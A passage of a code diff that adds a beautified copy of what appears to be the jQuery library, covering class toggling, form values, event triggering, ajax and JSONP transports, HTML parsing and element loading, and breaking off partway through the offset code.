+ toggleClass: function (e, t) {
3154
+ var n = typeof e,
3155
+ r = "string" === n || Array.isArray(e);
3156
+ return "boolean" == typeof t && r
3157
+ ? t
3158
+ ? this.addClass(e)
3159
+ : this.removeClass(e)
3160
+ : h(e)
3161
+ ? this.each(function (n) {
3162
+ b(this).toggleClass(e.call(this, n, to(this), t), t);
3163
+ })
3164
+ : this.each(function () {
3165
+ var t, i, o, a;
3166
+ if (r) for (i = 0, o = b(this), a = ta(e); (t = a[i++]); ) o.hasClass(t) ? o.removeClass(t) : o.addClass(t);
3167
+ else (void 0 !== e && "boolean" !== n) || ((t = to(this)) && Y.set(this, "__className__", t), this.setAttribute && this.setAttribute("class", t || !1 === e ? "" : Y.get(this, "__className__") || ""));
3168
+ });
3169
+ },
3170
+ hasClass: function (e) {
3171
+ var t,
3172
+ n,
3173
+ r = 0;
3174
+ for (t = " " + e + " "; (n = this[r++]); ) if (1 === n.nodeType && (" " + ti(to(n)) + " ").indexOf(t) > -1) return !0;
3175
+ return !1;
3176
+ },
3177
+ });
3178
+ var ts = /\r/g;
3179
+ b.fn.extend({
3180
+ val: function (e) {
3181
+ var t,
3182
+ n,
3183
+ r,
3184
+ i = this[0];
3185
+ return arguments.length
3186
+ ? ((r = h(e)),
3187
+ this.each(function (n) {
3188
+ var i;
3189
+ 1 === this.nodeType &&
3190
+ (null == (i = r ? e.call(this, n, b(this).val()) : e)
3191
+ ? (i = "")
3192
+ : "number" == typeof i
3193
+ ? (i += "")
3194
+ : Array.isArray(i) &&
3195
+ (i = b.map(i, function (e) {
3196
+ return null == e ? "" : e + "";
3197
+ })),
3198
+ ((t = b.valHooks[this.type] || b.valHooks[this.nodeName.toLowerCase()]) && "set" in t && void 0 !== t.set(this, i, "value")) || (this.value = i));
3199
+ }))
3200
+ : i
3201
+ ? (t = b.valHooks[i.type] || b.valHooks[i.nodeName.toLowerCase()]) && "get" in t && void 0 !== (n = t.get(i, "value"))
3202
+ ? n
3203
+ : "string" == typeof (n = i.value)
3204
+ ? n.replace(ts, "")
3205
+ : null == n
3206
+ ? ""
3207
+ : n
3208
+ : void 0;
3209
+ },
3210
+ }),
3211
+ b.extend({
3212
+ valHooks: {
3213
+ option: {
3214
+ get: function (e) {
3215
+ var t = b.find.attr(e, "value");
3216
+ return null != t ? t : ti(b.text(e));
3217
+ },
3218
+ },
3219
+ select: {
3220
+ get: function (e) {
3221
+ var t,
3222
+ n,
3223
+ r,
3224
+ i = e.options,
3225
+ o = e.selectedIndex,
3226
+ a = "select-one" === e.type,
3227
+ s = a ? null : [],
3228
+ u = a ? o + 1 : i.length;
3229
+ for (r = o < 0 ? u : a ? o : 0; r < u; r++)
3230
+ if (((n = i[r]).selected || r === o) && !n.disabled && (!n.parentNode.disabled || !S(n.parentNode, "optgroup"))) {
3231
+ if (((t = b(n).val()), a)) return t;
3232
+ s.push(t);
3233
+ }
3234
+ return s;
3235
+ },
3236
+ set: function (e, t) {
3237
+ for (var n, r, i = e.options, o = b.makeArray(t), a = i.length; a--; ) ((r = i[a]).selected = b.inArray(b.valHooks.option.get(r), o) > -1) && (n = !0);
3238
+ return n || (e.selectedIndex = -1), o;
3239
+ },
3240
+ },
3241
+ },
3242
+ }),
3243
+ b.each(["radio", "checkbox"], function () {
3244
+ (b.valHooks[this] = {
3245
+ set: function (e, t) {
3246
+ if (Array.isArray(t)) return (e.checked = b.inArray(b(e).val(), t) > -1);
3247
+ },
3248
+ }),
3249
+ d.checkOn ||
3250
+ (b.valHooks[this].get = function (e) {
3251
+ return null === e.getAttribute("value") ? "on" : e.value;
3252
+ });
3253
+ }),
3254
+ (d.focusin = "onfocusin" in e);
3255
+ var tu = /^(?:focusinfocus|focusoutblur)$/,
3256
+ tl = function (e) {
3257
+ e.stopPropagation();
3258
+ };
3259
+ b.extend(b.event, {
3260
+ trigger: function (t, n, r, i) {
3261
+ var o,
3262
+ a,
3263
+ s,
3264
+ u,
3265
+ l,
3266
+ f,
3267
+ p,
3268
+ d,
3269
+ m = [r || v],
3270
+ y = c.call(t, "type") ? t.type : t,
3271
+ x = c.call(t, "namespace") ? t.namespace.split(".") : [];
3272
+ if (
3273
+ ((a = d = s = r = r || v),
3274
+ 3 !== r.nodeType &&
3275
+ 8 !== r.nodeType &&
3276
+ !tu.test(y + b.event.triggered) &&
3277
+ (y.indexOf(".") > -1 && ((y = (x = y.split(".")).shift()), x.sort()),
3278
+ (l = 0 > y.indexOf(":") && "on" + y),
3279
+ ((t = t[b.expando] ? t : new b.Event(y, "object" == typeof t && t)).isTrigger = i ? 2 : 3),
3280
+ (t.namespace = x.join(".")),
3281
+ (t.rnamespace = t.namespace ? RegExp("(^|\\.)" + x.join("\\.(?:.*\\.|)") + "(\\.|$)") : null),
3282
+ (t.result = void 0),
3283
+ t.target || (t.target = r),
3284
+ (n = null == n ? [t] : b.makeArray(n, [t])),
3285
+ (p = b.event.special[y] || {}),
3286
+ i || !p.trigger || !1 !== p.trigger.apply(r, n)))
3287
+ ) {
3288
+ if (!i && !p.noBubble && !g(r)) {
3289
+ for (u = p.delegateType || y, tu.test(u + y) || (a = a.parentNode); a; a = a.parentNode) m.push(a), (s = a);
3290
+ s === (r.ownerDocument || v) && m.push(s.defaultView || s.parentWindow || e);
3291
+ }
3292
+ for (o = 0; (a = m[o++]) && !t.isPropagationStopped(); )
3293
+ (d = a),
3294
+ (t.type = o > 1 ? u : p.bindType || y),
3295
+ (f = (Y.get(a, "events") || Object.create(null))[t.type] && Y.get(a, "handle")) && f.apply(a, n),
3296
+ (f = l && a[l]) && f.apply && V(a) && ((t.result = f.apply(a, n)), !1 === t.result && t.preventDefault());
3297
+ return (
3298
+ (t.type = y),
3299
+ i ||
3300
+ t.isDefaultPrevented() ||
3301
+ (p._default && !1 !== p._default.apply(m.pop(), n)) ||
3302
+ !V(r) ||
3303
+ (l &&
3304
+ h(r[y]) &&
3305
+ !g(r) &&
3306
+ ((s = r[l]) && (r[l] = null),
3307
+ (b.event.triggered = y),
3308
+ t.isPropagationStopped() && d.addEventListener(y, tl),
3309
+ r[y](),
3310
+ t.isPropagationStopped() && d.removeEventListener(y, tl),
3311
+ (b.event.triggered = void 0),
3312
+ s && (r[l] = s))),
3313
+ t.result
3314
+ );
3315
+ }
3316
+ },
3317
+ simulate: function (e, t, n) {
3318
+ var r = b.extend(new b.Event(), n, { type: e, isSimulated: !0 });
3319
+ b.event.trigger(r, null, t);
3320
+ },
3321
+ }),
3322
+ b.fn.extend({
3323
+ trigger: function (e, t) {
3324
+ return this.each(function () {
3325
+ b.event.trigger(e, t, this);
3326
+ });
3327
+ },
3328
+ triggerHandler: function (e, t) {
3329
+ var n = this[0];
3330
+ if (n) return b.event.trigger(e, t, n, !0);
3331
+ },
3332
+ }),
3333
+ d.focusin ||
3334
+ b.each({ focus: "focusin", blur: "focusout" }, function (e, t) {
3335
+ var n = function (e) {
3336
+ b.event.simulate(t, e.target, b.event.fix(e));
3337
+ };
3338
+ b.event.special[t] = {
3339
+ setup: function () {
3340
+ var r = this.ownerDocument || this.document || this,
3341
+ i = Y.access(r, t);
3342
+ i || r.addEventListener(e, n, !0), Y.access(r, t, (i || 0) + 1);
3343
+ },
3344
+ teardown: function () {
3345
+ var r = this.ownerDocument || this.document || this,
3346
+ i = Y.access(r, t) - 1;
3347
+ i ? Y.access(r, t, i) : (r.removeEventListener(e, n, !0), Y.remove(r, t));
3348
+ },
3349
+ };
3350
+ });
3351
+ var tc = e.location,
3352
+ tf = { guid: Date.now() },
3353
+ tp = /\?/;
3354
+ b.parseXML = function (t) {
3355
+ var n, r;
3356
+ if (!t || "string" != typeof t) return null;
3357
+ try {
3358
+ n = new e.DOMParser().parseFromString(t, "text/xml");
3359
+ } catch (i) {}
3360
+ return (
3361
+ (r = n && n.getElementsByTagName("parsererror")[0]),
3362
+ (n && !r) ||
3363
+ b.error(
3364
+ "Invalid XML: " +
3365
+ (r
3366
+ ? b
3367
+ .map(r.childNodes, function (e) {
3368
+ return e.textContent;
3369
+ })
3370
+ .join("\n")
3371
+ : t)
3372
+ ),
3373
+ n
3374
+ );
3375
+ };
3376
+ var td = /\[\]$/,
3377
+ th = /\r?\n/g,
3378
+ tg = /^(?:submit|button|image|reset|file)$/i,
3379
+ tv = /^(?:input|select|textarea|keygen)/i;
3380
+ function tm(e, t, n, r) {
3381
+ var i;
3382
+ if (Array.isArray(t))
3383
+ b.each(t, function (t, i) {
3384
+ n || td.test(e) ? r(e, i) : tm(e + "[" + ("object" == typeof i && null != i ? t : "") + "]", i, n, r);
3385
+ });
3386
+ else if (n || "object" !== x(t)) r(e, t);
3387
+ else for (i in t) tm(e + "[" + i + "]", t[i], n, r);
3388
+ }
3389
+ (b.param = function (e, t) {
3390
+ var n,
3391
+ r = [],
3392
+ i = function (e, t) {
3393
+ var n = h(t) ? t() : t;
3394
+ r[r.length] = encodeURIComponent(e) + "=" + encodeURIComponent(null == n ? "" : n);
3395
+ };
3396
+ if (null == e) return "";
3397
+ if (Array.isArray(e) || (e.jquery && !b.isPlainObject(e)))
3398
+ b.each(e, function () {
3399
+ i(this.name, this.value);
3400
+ });
3401
+ else for (n in e) tm(n, e[n], t, i);
3402
+ return r.join("&");
3403
+ }),
3404
+ b.fn.extend({
3405
+ serialize: function () {
3406
+ return b.param(this.serializeArray());
3407
+ },
3408
+ serializeArray: function () {
3409
+ return this.map(function () {
3410
+ var e = b.prop(this, "elements");
3411
+ return e ? b.makeArray(e) : this;
3412
+ })
3413
+ .filter(function () {
3414
+ var e = this.type;
3415
+ return this.name && !b(this).is(":disabled") && tv.test(this.nodeName) && !tg.test(e) && (this.checked || !ed.test(e));
3416
+ })
3417
+ .map(function (e, t) {
3418
+ var n = b(this).val();
3419
+ return null == n
3420
+ ? null
3421
+ : Array.isArray(n)
3422
+ ? b.map(n, function (e) {
3423
+ return { name: t.name, value: e.replace(th, "\r\n") };
3424
+ })
3425
+ : { name: t.name, value: n.replace(th, "\r\n") };
3426
+ })
3427
+ .get();
3428
+ },
3429
+ });
3430
+ var ty = /%20/g,
3431
+ t$ = /#.*$/,
3432
+ tx = /([?&])_=[^&]*/,
3433
+ tb = /^(.*?):[ \t]*([^\r\n]*)$/gm,
3434
+ t_ = /^(?:GET|HEAD)$/,
3435
+ tT = /^\/\//,
3436
+ tw = {},
3437
+ tC = {},
3438
+ tk = "*/".concat("*"),
3439
+ tS = v.createElement("a");
3440
+ function tE(e) {
3441
+ return function (t, n) {
3442
+ "string" != typeof t && ((n = t), (t = "*"));
3443
+ var r,
3444
+ i = 0,
3445
+ o = t.toLowerCase().match(H) || [];
3446
+ if (h(n)) for (; (r = o[i++]); ) "+" === r[0] ? (e[(r = r.slice(1) || "*")] = e[r] || []).unshift(n) : (e[r] = e[r] || []).push(n);
3447
+ };
3448
+ }
3449
+ function tN(e, t, n, r) {
3450
+ var i = {},
3451
+ o = e === tC;
3452
+ function a(s) {
3453
+ var u;
3454
+ return (
3455
+ (i[s] = !0),
3456
+ b.each(e[s] || [], function (e, s) {
3457
+ var l = s(t, n, r);
3458
+ return "string" != typeof l || o || i[l] ? (o ? !(u = l) : void 0) : (t.dataTypes.unshift(l), a(l), !1);
3459
+ }),
3460
+ u
3461
+ );
3462
+ }
3463
+ return a(t.dataTypes[0]) || (!i["*"] && a("*"));
3464
+ }
3465
+ function tA(e, t) {
3466
+ var n,
3467
+ r,
3468
+ i = b.ajaxSettings.flatOptions || {};
3469
+ for (n in t) void 0 !== t[n] && ((i[n] ? e : r || (r = {}))[n] = t[n]);
3470
+ return r && b.extend(!0, e, r), e;
3471
+ }
3472
+ (tS.href = tc.href),
3473
+ b.extend({
3474
+ active: 0,
3475
+ lastModified: {},
3476
+ etag: {},
3477
+ ajaxSettings: {
3478
+ url: tc.href,
3479
+ type: "GET",
3480
+ isLocal: /^(?:about|app|app-storage|.+-extension|file|res|widget):$/.test(tc.protocol),
3481
+ global: !0,
3482
+ processData: !0,
3483
+ async: !0,
3484
+ contentType: "application/x-www-form-urlencoded; charset=UTF-8",
3485
+ accepts: { "*": tk, text: "text/plain", html: "text/html", xml: "application/xml, text/xml", json: "application/json, text/javascript" },
3486
+ contents: { xml: /\bxml\b/, html: /\bhtml/, json: /\bjson\b/ },
3487
+ responseFields: { xml: "responseXML", text: "responseText", json: "responseJSON" },
3488
+ converters: { "* text": String, "text html": !0, "text json": JSON.parse, "text xml": b.parseXML },
3489
+ flatOptions: { url: !0, context: !0 },
3490
+ },
3491
+ ajaxSetup: function (e, t) {
3492
+ return t ? tA(tA(e, b.ajaxSettings), t) : tA(b.ajaxSettings, e);
3493
+ },
3494
+ ajaxPrefilter: tE(tw),
3495
+ ajaxTransport: tE(tC),
3496
+ ajax: function (t, n) {
3497
+ "object" == typeof t && ((n = t), (t = void 0)), (n = n || {});
3498
+ var r,
3499
+ i,
3500
+ o,
3501
+ a,
3502
+ s,
3503
+ u,
3504
+ l,
3505
+ c,
3506
+ f,
3507
+ p,
3508
+ d = b.ajaxSetup({}, n),
3509
+ h = d.context || d,
3510
+ g = d.context && (h.nodeType || h.jquery) ? b(h) : b.event,
3511
+ m = b.Deferred(),
3512
+ y = b.Callbacks("once memory"),
3513
+ x = d.statusCode || {},
3514
+ _ = {},
3515
+ T = {},
3516
+ w = "canceled",
3517
+ C = {
3518
+ readyState: 0,
3519
+ getResponseHeader: function (e) {
3520
+ var t;
3521
+ if (l) {
3522
+ if (!a) for (a = {}; (t = tb.exec(o)); ) a[t[1].toLowerCase() + " "] = (a[t[1].toLowerCase() + " "] || []).concat(t[2]);
3523
+ t = a[e.toLowerCase() + " "];
3524
+ }
3525
+ return null == t ? null : t.join(", ");
3526
+ },
3527
+ getAllResponseHeaders: function () {
3528
+ return l ? o : null;
3529
+ },
3530
+ setRequestHeader: function (e, t) {
3531
+ return null == l && (_[(e = T[e.toLowerCase()] = T[e.toLowerCase()] || e)] = t), this;
3532
+ },
3533
+ overrideMimeType: function (e) {
3534
+ return null == l && (d.mimeType = e), this;
3535
+ },
3536
+ statusCode: function (e) {
3537
+ var t;
3538
+ if (e) {
3539
+ if (l) C.always(e[C.status]);
3540
+ else for (t in e) x[t] = [x[t], e[t]];
3541
+ }
3542
+ return this;
3543
+ },
3544
+ abort: function (e) {
3545
+ var t = e || w;
3546
+ return r && r.abort(t), E(0, t), this;
3547
+ },
3548
+ };
3549
+ if (
3550
+ (m.promise(C),
3551
+ (d.url = ((t || d.url || tc.href) + "").replace(tT, tc.protocol + "//")),
3552
+ (d.type = n.method || n.type || d.method || d.type),
3553
+ (d.dataTypes = (d.dataType || "*").toLowerCase().match(H) || [""]),
3554
+ null == d.crossDomain)
3555
+ ) {
3556
+ u = v.createElement("a");
3557
+ try {
3558
+ (u.href = d.url), (u.href = u.href), (d.crossDomain = tS.protocol + "//" + tS.host != u.protocol + "//" + u.host);
3559
+ } catch (k) {
3560
+ d.crossDomain = !0;
3561
+ }
3562
+ }
3563
+ if ((d.data && d.processData && "string" != typeof d.data && (d.data = b.param(d.data, d.traditional)), tN(tw, d, n, C), l)) return C;
3564
+ for (f in ((c = b.event && d.global) && 0 == b.active++ && b.event.trigger("ajaxStart"),
3565
+ (d.type = d.type.toUpperCase()),
3566
+ (d.hasContent = !t_.test(d.type)),
3567
+ (i = d.url.replace(t$, "")),
3568
+ d.hasContent
3569
+ ? d.data && d.processData && 0 === (d.contentType || "").indexOf("application/x-www-form-urlencoded") && (d.data = d.data.replace(ty, "+"))
3570
+ : ((p = d.url.slice(i.length)),
3571
+ d.data && (d.processData || "string" == typeof d.data) && ((i += (tp.test(i) ? "&" : "?") + d.data), delete d.data),
3572
+ !1 === d.cache && ((i = i.replace(tx, "$1")), (p = (tp.test(i) ? "&" : "?") + "_=" + tf.guid++ + p)),
3573
+ (d.url = i + p)),
3574
+ d.ifModified && (b.lastModified[i] && C.setRequestHeader("If-Modified-Since", b.lastModified[i]), b.etag[i] && C.setRequestHeader("If-None-Match", b.etag[i])),
3575
+ ((d.data && d.hasContent && !1 !== d.contentType) || n.contentType) && C.setRequestHeader("Content-Type", d.contentType),
3576
+ C.setRequestHeader("Accept", d.dataTypes[0] && d.accepts[d.dataTypes[0]] ? d.accepts[d.dataTypes[0]] + ("*" !== d.dataTypes[0] ? ", " + tk + "; q=0.01" : "") : d.accepts["*"]),
3577
+ d.headers))
3578
+ C.setRequestHeader(f, d.headers[f]);
3579
+ if (d.beforeSend && (!1 === d.beforeSend.call(h, C, d) || l)) return C.abort();
3580
+ if (((w = "abort"), y.add(d.complete), C.done(d.success), C.fail(d.error), (r = tN(tC, d, n, C)))) {
3581
+ if (((C.readyState = 1), c && g.trigger("ajaxSend", [C, d]), l)) return C;
3582
+ d.async &&
3583
+ d.timeout > 0 &&
3584
+ (s = e.setTimeout(function () {
3585
+ C.abort("timeout");
3586
+ }, d.timeout));
3587
+ try {
3588
+ (l = !1), r.send(_, E);
3589
+ } catch (S) {
3590
+ if (l) throw S;
3591
+ E(-1, S);
3592
+ }
3593
+ } else E(-1, "No Transport");
3594
+ function E(t, n, a, u) {
3595
+ var f,
3596
+ p,
3597
+ v,
3598
+ _,
3599
+ T,
3600
+ w = n;
3601
+ l ||
3602
+ ((l = !0),
3603
+ s && e.clearTimeout(s),
3604
+ (r = void 0),
3605
+ (o = u || ""),
3606
+ (C.readyState = t > 0 ? 4 : 0),
3607
+ (f = (t >= 200 && t < 300) || 304 === t),
3608
+ a &&
3609
+ (_ = (function (e, t, n) {
3610
+ for (var r, i, o, a, s = e.contents, u = e.dataTypes; "*" === u[0]; ) u.shift(), void 0 === r && (r = e.mimeType || t.getResponseHeader("Content-Type"));
3611
+ if (r) {
3612
+ for (i in s)
3613
+ if (s[i] && s[i].test(r)) {
3614
+ u.unshift(i);
3615
+ break;
3616
+ }
3617
+ }
3618
+ if (u[0] in n) o = u[0];
3619
+ else {
3620
+ for (i in n) {
3621
+ if (!u[0] || e.converters[i + " " + u[0]]) {
3622
+ o = i;
3623
+ break;
3624
+ }
3625
+ a || (a = i);
3626
+ }
3627
+ o = o || a;
3628
+ }
3629
+ if (o) return o !== u[0] && u.unshift(o), n[o];
3630
+ })(d, C, a)),
3631
+ !f && b.inArray("script", d.dataTypes) > -1 && 0 > b.inArray("json", d.dataTypes) && (d.converters["text script"] = function () {}),
3632
+ (_ = (function (e, t, n, r) {
3633
+ var i,
3634
+ o,
3635
+ a,
3636
+ s,
3637
+ u,
3638
+ l = {},
3639
+ c = e.dataTypes.slice();
3640
+ if (c[1]) for (a in e.converters) l[a.toLowerCase()] = e.converters[a];
3641
+ for (o = c.shift(); o; )
3642
+ if ((e.responseFields[o] && (n[e.responseFields[o]] = t), !u && r && e.dataFilter && (t = e.dataFilter(t, e.dataType)), (u = o), (o = c.shift()))) {
3643
+ if ("*" === o) o = u;
3644
+ else if ("*" !== u && u !== o) {
3645
+ if (!(a = l[u + " " + o] || l["* " + o])) {
3646
+ for (i in l)
3647
+ if ((s = i.split(" "))[1] === o && (a = l[u + " " + s[0]] || l["* " + s[0]])) {
3648
+ !0 === a ? (a = l[i]) : !0 !== l[i] && ((o = s[0]), c.unshift(s[1]));
3649
+ break;
3650
+ }
3651
+ }
3652
+ if (!0 !== a) {
3653
+ if (a && e.throws) t = a(t);
3654
+ else
3655
+ try {
3656
+ t = a(t);
3657
+ } catch (f) {
3658
+ return { state: "parsererror", error: a ? f : "No conversion from " + u + " to " + o };
3659
+ }
3660
+ }
3661
+ }
3662
+ }
3663
+ return { state: "success", data: t };
3664
+ })(d, _, C, f)),
3665
+ f
3666
+ ? (d.ifModified && ((T = C.getResponseHeader("Last-Modified")) && (b.lastModified[i] = T), (T = C.getResponseHeader("etag")) && (b.etag[i] = T)),
3667
+ 204 === t || "HEAD" === d.type ? (w = "nocontent") : 304 === t ? (w = "notmodified") : ((w = _.state), (p = _.data), (f = !(v = _.error))))
3668
+ : ((v = w), (!t && w) || ((w = "error"), t < 0 && (t = 0))),
3669
+ (C.status = t),
3670
+ (C.statusText = (n || w) + ""),
3671
+ f ? m.resolveWith(h, [p, w, C]) : m.rejectWith(h, [C, w, v]),
3672
+ C.statusCode(x),
3673
+ (x = void 0),
3674
+ c && g.trigger(f ? "ajaxSuccess" : "ajaxError", [C, d, f ? p : v]),
3675
+ y.fireWith(h, [C, w]),
3676
+ c && (g.trigger("ajaxComplete", [C, d]), --b.active || b.event.trigger("ajaxStop")));
3677
+ }
3678
+ return C;
3679
+ },
3680
+ getJSON: function (e, t, n) {
3681
+ return b.get(e, t, n, "json");
3682
+ },
3683
+ getScript: function (e, t) {
3684
+ return b.get(e, void 0, t, "script");
3685
+ },
3686
+ }),
3687
+ b.each(["get", "post"], function (e, t) {
3688
+ b[t] = function (e, n, r, i) {
3689
+ return h(n) && ((i = i || r), (r = n), (n = void 0)), b.ajax(b.extend({ url: e, type: t, dataType: i, data: n, success: r }, b.isPlainObject(e) && e));
3690
+ };
3691
+ }),
3692
+ b.ajaxPrefilter(function (e) {
3693
+ var t;
3694
+ for (t in e.headers) "content-type" === t.toLowerCase() && (e.contentType = e.headers[t] || "");
3695
+ }),
3696
+ (b._evalUrl = function (e, t, n) {
3697
+ return b.ajax({
3698
+ url: e,
3699
+ type: "GET",
3700
+ dataType: "script",
3701
+ cache: !0,
3702
+ async: !1,
3703
+ global: !1,
3704
+ converters: { "text script": function () {} },
3705
+ dataFilter: function (e) {
3706
+ b.globalEval(e, t, n);
3707
+ },
3708
+ });
3709
+ }),
3710
+ b.fn.extend({
3711
+ wrapAll: function (e) {
3712
+ var t;
3713
+ return (
3714
+ this[0] &&
3715
+ (h(e) && (e = e.call(this[0])),
3716
+ (t = b(e, this[0].ownerDocument).eq(0).clone(!0)),
3717
+ this[0].parentNode && t.insertBefore(this[0]),
3718
+ t
3719
+ .map(function () {
3720
+ for (var e = this; e.firstElementChild; ) e = e.firstElementChild;
3721
+ return e;
3722
+ })
3723
+ .append(this)),
3724
+ this
3725
+ );
3726
+ },
3727
+ wrapInner: function (e) {
3728
+ return h(e)
3729
+ ? this.each(function (t) {
3730
+ b(this).wrapInner(e.call(this, t));
3731
+ })
3732
+ : this.each(function () {
3733
+ var t = b(this),
3734
+ n = t.contents();
3735
+ n.length ? n.wrapAll(e) : t.append(e);
3736
+ });
3737
+ },
3738
+ wrap: function (e) {
3739
+ var t = h(e);
3740
+ return this.each(function (n) {
3741
+ b(this).wrapAll(t ? e.call(this, n) : e);
3742
+ });
3743
+ },
3744
+ unwrap: function (e) {
3745
+ return (
3746
+ this.parent(e)
3747
+ .not("body")
3748
+ .each(function () {
3749
+ b(this).replaceWith(this.childNodes);
3750
+ }),
3751
+ this
3752
+ );
3753
+ },
3754
+ }),
3755
+ (b.expr.pseudos.hidden = function (e) {
3756
+ return !b.expr.pseudos.visible(e);
3757
+ }),
3758
+ (b.expr.pseudos.visible = function (e) {
3759
+ return !!(e.offsetWidth || e.offsetHeight || e.getClientRects().length);
3760
+ }),
3761
+ (b.ajaxSettings.xhr = function () {
3762
+ try {
3763
+ return new e.XMLHttpRequest();
3764
+ } catch (t) {}
3765
+ });
3766
+ var tD = { 0: 200, 1223: 204 },
3767
+ tj = b.ajaxSettings.xhr();
3768
+ (d.cors = !!tj && "withCredentials" in tj),
3769
+ (d.ajax = tj = !!tj),
3770
+ b.ajaxTransport(function (t) {
3771
+ var n, r;
3772
+ if (d.cors || (tj && !t.crossDomain))
3773
+ return {
3774
+ send: function (i, o) {
3775
+ var a,
3776
+ s = t.xhr();
3777
+ if ((s.open(t.type, t.url, t.async, t.username, t.password), t.xhrFields)) for (a in t.xhrFields) s[a] = t.xhrFields[a];
3778
+ for (a in (t.mimeType && s.overrideMimeType && s.overrideMimeType(t.mimeType), t.crossDomain || i["X-Requested-With"] || (i["X-Requested-With"] = "XMLHttpRequest"), i)) s.setRequestHeader(a, i[a]);
3779
+ (n = function (e) {
3780
+ return function () {
3781
+ n &&
3782
+ ((n = r = s.onload = s.onerror = s.onabort = s.ontimeout = s.onreadystatechange = null),
3783
+ "abort" === e
3784
+ ? s.abort()
3785
+ : "error" === e
3786
+ ? "number" != typeof s.status
3787
+ ? o(0, "error")
3788
+ : o(s.status, s.statusText)
3789
+ : o(tD[s.status] || s.status, s.statusText, "text" !== (s.responseType || "text") || "string" != typeof s.responseText ? { binary: s.response } : { text: s.responseText }, s.getAllResponseHeaders()));
3790
+ };
3791
+ }),
3792
+ (s.onload = n()),
3793
+ (r = s.onerror = s.ontimeout = n("error")),
3794
+ void 0 !== s.onabort
3795
+ ? (s.onabort = r)
3796
+ : (s.onreadystatechange = function () {
3797
+ 4 === s.readyState &&
3798
+ e.setTimeout(function () {
3799
+ n && r();
3800
+ });
3801
+ }),
3802
+ (n = n("abort"));
3803
+ try {
3804
+ s.send((t.hasContent && t.data) || null);
3805
+ } catch (u) {
3806
+ if (n) throw u;
3807
+ }
3808
+ },
3809
+ abort: function () {
3810
+ n && n();
3811
+ },
3812
+ };
3813
+ }),
3814
+ b.ajaxPrefilter(function (e) {
3815
+ e.crossDomain && (e.contents.script = !1);
3816
+ }),
3817
+ b.ajaxSetup({
3818
+ accepts: { script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript" },
3819
+ contents: { script: /\b(?:java|ecma)script\b/ },
3820
+ converters: {
3821
+ "text script": function (e) {
3822
+ return b.globalEval(e), e;
3823
+ },
3824
+ },
3825
+ }),
3826
+ b.ajaxPrefilter("script", function (e) {
3827
+ void 0 === e.cache && (e.cache = !1), e.crossDomain && (e.type = "GET");
3828
+ }),
3829
+ b.ajaxTransport("script", function (e) {
3830
+ var t, n;
3831
+ if (e.crossDomain || e.scriptAttrs)
3832
+ return {
3833
+ send: function (r, i) {
3834
+ (t = b("<script>")
3835
+ .attr(e.scriptAttrs || {})
3836
+ .prop({ charset: e.scriptCharset, src: e.url })
3837
+ .on(
3838
+ "load error",
3839
+ (n = function (e) {
3840
+ t.remove(), (n = null), e && i("error" === e.type ? 404 : 200, e.type);
3841
+ })
3842
+ )),
3843
+ v.head.appendChild(t[0]);
3844
+ },
3845
+ abort: function () {
3846
+ n && n();
3847
+ },
3848
+ };
3849
+ });
3850
+ var tq,
3851
+ tL = [],
3852
+ tH = /(=)\?(?=&|$)|\?\?/;
3853
+ b.ajaxSetup({
3854
+ jsonp: "callback",
3855
+ jsonpCallback: function () {
3856
+ var e = tL.pop() || b.expando + "_" + tf.guid++;
3857
+ return (this[e] = !0), e;
3858
+ },
3859
+ }),
3860
+ b.ajaxPrefilter("json jsonp", function (t, n, r) {
3861
+ var i,
3862
+ o,
3863
+ a,
3864
+ s = !1 !== t.jsonp && (tH.test(t.url) ? "url" : "string" == typeof t.data && 0 === (t.contentType || "").indexOf("application/x-www-form-urlencoded") && tH.test(t.data) && "data");
3865
+ if (s || "jsonp" === t.dataTypes[0])
3866
+ return (
3867
+ (i = t.jsonpCallback = h(t.jsonpCallback) ? t.jsonpCallback() : t.jsonpCallback),
3868
+ s ? (t[s] = t[s].replace(tH, "$1" + i)) : !1 !== t.jsonp && (t.url += (tp.test(t.url) ? "&" : "?") + t.jsonp + "=" + i),
3869
+ (t.converters["script json"] = function () {
3870
+ return a || b.error(i + " was not called"), a[0];
3871
+ }),
3872
+ (t.dataTypes[0] = "json"),
3873
+ (o = e[i]),
3874
+ (e[i] = function () {
3875
+ a = arguments;
3876
+ }),
3877
+ r.always(function () {
3878
+ void 0 === o ? b(e).removeProp(i) : (e[i] = o), t[i] && ((t.jsonpCallback = n.jsonpCallback), tL.push(i)), a && h(o) && o(a[0]), (a = o = void 0);
3879
+ }),
3880
+ "script"
3881
+ );
3882
+ }),
3883
+ (d.createHTMLDocument = (((tq = v.implementation.createHTMLDocument("").body).innerHTML = "<form></form><form></form>"), 2 === tq.childNodes.length)),
3884
+ (b.parseHTML = function (e, t, n) {
3885
+ var r, i, o;
3886
+ return "string" != typeof e
3887
+ ? []
3888
+ : ("boolean" == typeof t && ((n = t), (t = !1)),
3889
+ t || (d.createHTMLDocument ? (((r = (t = v.implementation.createHTMLDocument("")).createElement("base")).href = v.location.href), t.head.appendChild(r)) : (t = v)),
3890
+ (o = !n && []),
3891
+ (i = E.exec(e)) ? [t.createElement(i[1])] : ((i = ex([e], t, o)), o && o.length && b(o).remove(), b.merge([], i.childNodes)));
3892
+ }),
3893
+ (b.fn.load = function (e, t, n) {
3894
+ var r,
3895
+ i,
3896
+ o,
3897
+ a = this,
3898
+ s = e.indexOf(" ");
3899
+ return (
3900
+ s > -1 && ((r = ti(e.slice(s))), (e = e.slice(0, s))),
3901
+ h(t) ? ((n = t), (t = void 0)) : t && "object" == typeof t && (i = "POST"),
3902
+ a.length > 0 &&
3903
+ b
3904
+ .ajax({ url: e, type: i || "GET", dataType: "html", data: t })
3905
+ .done(function (e) {
3906
+ (o = arguments), a.html(r ? b("<div>").append(b.parseHTML(e)).find(r) : e);
3907
+ })
3908
+ .always(
3909
+ n &&
3910
+ function (e, t) {
3911
+ a.each(function () {
3912
+ n.apply(this, o || [e.responseText, t, e]);
3913
+ });
3914
+ }
3915
+ ),
3916
+ this
3917
+ );
3918
+ }),
3919
+ (b.expr.pseudos.animated = function (e) {
3920
+ return b.grep(b.timers, function (t) {
3921
+ return e === t.elem;
3922
+ }).length;
3923
+ }),
3924
+ (b.offset = {
3925
+ setOffset: function (e, t, n) {
3926
+ var r,
3927
+ i,
3928
+ o,
3929
+ a,
3930
+ s,
3931
+ u,
3932
+ l = b.css(e, "position"),
3933
+ c = b(e),
3934
+ f = {};
3935
+ "static" === l && (e.style.position = "relative"),
3936
+ (s = c.offset()),
3937
+ (o = b.css(e, "top")),
3938
+ (u = b.css(e, "left")),
3939
